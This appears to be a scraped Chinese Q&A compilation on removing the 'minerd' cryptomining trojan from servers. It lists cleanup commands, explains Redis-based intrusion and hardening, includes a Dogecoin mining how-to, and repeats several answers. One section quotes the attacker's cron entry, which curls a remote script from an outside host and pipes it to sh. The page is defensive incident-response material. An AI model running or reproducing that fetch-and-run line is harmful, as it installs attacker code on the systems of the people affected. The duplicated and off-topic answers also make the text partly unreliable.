minerd挖矿木马端口

『壹』 怎样 删除 mineros.exe 这种挖矿程序

最近一台安装了Gitlab的服务器发生了高负载告警，Cpu使用情况如下：

让后登录到服务器，利用top查看CPU使用情况，这个叫minerd的程序消耗cpu较大，如下图所示：

这个程序并不是我们的正常服务程序，心里一想肯定被黑了，然后就搜索了一下这个程序，果真就是个挖矿木马程序，既然已经知道他是木马程序，那就看看它是怎么工作的，然后怎么修复一下后门。

这个程序放在/opt/minerd下，在确定跟项目不相关的情况下判断是个木马程序，果断kill掉进程，然后删除/opt下minerd文件。

展

『贰』 狗狗币挖矿 狗狗币怎么挖

一、下载cpu挖矿工具 地址https://sourceforge.net/projects/cpuminer/files/

四、运行start.bat

(2)minerd挖矿木马端口扩展阅读:

Dogecoin，有人称作“狗狗币/狗币”，诞生于2013年12月8日，基于Scrypt算法，是国际上用户数仅次于比特币的第二大虚拟货币。

数字货币是民间发起的全球通用货币，不属于某个国家，是属于全人类，具有全球转帐速度快的优点，如几秒内就可以把钱由国内汇到美国，且费用低廉，并且总量不会像法币一样随意增发，总量相对稳定。

矿机，就是用于赚取虚拟币的电脑，这类电脑一般有专业的挖矿晶元，多采用烧显卡的方式工作，耗电量较大。用户用个人电脑下载软体然后运行特定演算法，与远方伺服器通讯后可得到相应虚拟币，是获取比特币的方式之一。

虚拟币是指互联网上面的一种虚拟出来的金钱。即高科技中代替实体货币流通的信息流或数据流。在信息技术高速发展的今天，实体货币远远不能满足人们的资金流动需求了。

虚拟货币与支票和电汇不同，虚拟货币不能实现的价值，不能通过银行转账，目前只能流通于网络世界，虚拟货币是由各网络机构自行放行，没有形成统一的发行和管理规范。

『叁』 怎么清除这个进程：monero cpu miner

1. 关闭访问挖矿服务器的访问

iptables -A INPUT -s xmr.crypto-pool.fr -j DROPandiptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.

2. chmod -x minerd ,取消掉执行权限， 在没有找到根源前，千万不要删除 minerd，因为删除了，过一回会自动有生成一个。

3. pkill minerd ,杀掉进程

4. service stop crond 或者 crontab -r 删除所有的执行计划

5. 执行top，查看了一会，没有再发现minerd 进程了。

6.检查/var/spool/cron/目录下发现有个root用户的定时器文件。

下载脚本的语句：

[plain] view plain

『肆』 没有root权限 minerd木马怎么清除

就是你没有最高权限，因为一般现在的手机对用户是不开放最高权限(害怕用户删除系统文件，导致手机系统崩溃，变板砖了~ ~)，这时候就要刷机，可个360手机助手里的刷机软件，不过那个只能刷一部分，别的刷不了的只能自己去网上找教程一步一步来了

『伍』 minerd.exe是什么

这是cpu挖矿的文件（不排除有病毒冒充哦）如果对你没用可以删除

『陆』 minerd挖矿工具软件是不是不能在平板电脑上运行

Minerd挖矿工具（适用于SRC/QRK/OFF挖矿）适用64位Windows操作系统，32位windows的用户可以不必下载。

『柒』 阿里云服务器被挖矿了怎么办(纯纯电脑小白

1. 关闭访问挖矿服务器的访问

iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.

2. chmod -x minerd ,取消掉执行权限， 在没有找到根源前，千万不要删除 minerd，因为删除了，过一回会自动有生成一个。

3. pkill minerd ,杀掉进程

4. service stop crond 或者 crontab -r 删除所有的执行计划

5. 执行top，查看了一会，没有再发现minerd 进程了。

6.检查/var/spool/cron/目录下发现有个root用户的定时器文件。

下载脚本的语句：

*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
病毒文件内容如下，感兴趣的可以研究下：

View Code

解决minerd并不是最终的目的，主要是要查找问题根源，我的服务器问题出在了redis服务了，黑客利用了redis的一个漏洞获得了服务器的访问权限，http://blog.jobbole.com/94518/然后就注入了病毒，下面是解决办法和清除工作：

1. 修复 redis 的后门,

配置bind选项, 限定可以连接Redis服务器的IP, 并修改redis的默认端口6379.
配置AUTH, 设置密码, 密码会以明文方式保存在redis配置文件中.
配置rename-command CONFIG “RENAME_CONFIG”, 这样即使存在未授权访问, 也能够给攻击者使用config指令加大难度
好消息是Redis作者表示将会开发”real user”，区分普通用户和admin权限，普通用户将会被禁止运行某些命令，如conf
2. 打开 ~/.ssh/authorized_keys, 删除你不认识的账号

3. 查看你的用户列表，是不是有你不认识的用户添加进来。 如果有就删除掉.

『捌』 怎么清除这个进程monero cpu miner

1. 关闭访问挖矿服务器的访问

iptables -A INPUT -s xmr.crypto-pool.fr -j DROPandiptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.

2. chmod -x minerd ,取消掉执行权限， 在没有找到根源前，千万不要删除 minerd，因为删除了，过一回会自动有生成一个。

3. pkill minerd ,杀掉进程

4. service stop crond 或者 crontab -r 删除所有的执行计划

5. 执行top，查看了一会，没有再发现minerd 进程了。

6.检查/var/spool/cron/目录下发现有个root用户的定时器文件。

下载脚本的语句：

[plain] view plain

『玖』 win7--64位系统minerd-x64-corei7.exe进程

没什么用 可能是插件